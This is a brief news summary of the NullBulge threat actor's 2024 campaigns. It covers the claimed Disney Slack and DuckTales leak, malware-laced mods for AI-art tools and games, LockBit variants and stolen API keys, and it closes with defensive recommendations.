Adrian Johnson
TLDR:
- NullBulge actor targeted Disney’s internal Slack communications
- Used tools like Python-based payloads, Discord webhooks, and LockBit ransomware
In a recent cyber attack, the NullBulge actor focused on obtaining confidential information from Disney’s internal communications using sophisticated tools and techniques. The group launched between April and June 2024, targeting AI and gaming communities. They used innovative malware distribution methods and compromised plug-ins and mods for AI-art applications and games. The NullBulge actor’s campaigns involved Python-based payloads that exfiltrated data through Discord webhooks, as well as the use of malware tools like Async RAT and Xworm.
One of the key tools used by NullBulge was the LockBit ransomware strain, which compromised legitimate software repositories and posed threats to AI and Gaming ecosystems. The group’s activities raised questions about their connection to the AppleBotzz identity, central to their attacks on platforms like GitHub and ModLand. NullBulge also released mods laced with PowerShell scripts to hack BeamNG players and launched custom LockBit ransomware variants.
The NullBulge actor also claimed to have attacked Disney and leaked DuckTales production files, along with an extensive collection of internal Slack data. Their advanced system employed supply chain attacks, multi-stage malware campaigns, and high-profile data dumpages, showcasing their threat capabilities. NullBulge stored and sold stolen infostealer logs and OpenAI API keys in underground forums, indicating a financial motive behind their actions.
Despite not being very sophisticated, NullBulge posed a significant threat by focusing on AI-based applications and games with basic malware and ransomware tools. Recommendations included securing API keys, scrutinizing third-party code, verifying code sources, monitoring commit histories, and avoiding installation from unknown sources to enhance cybersecurity measures.
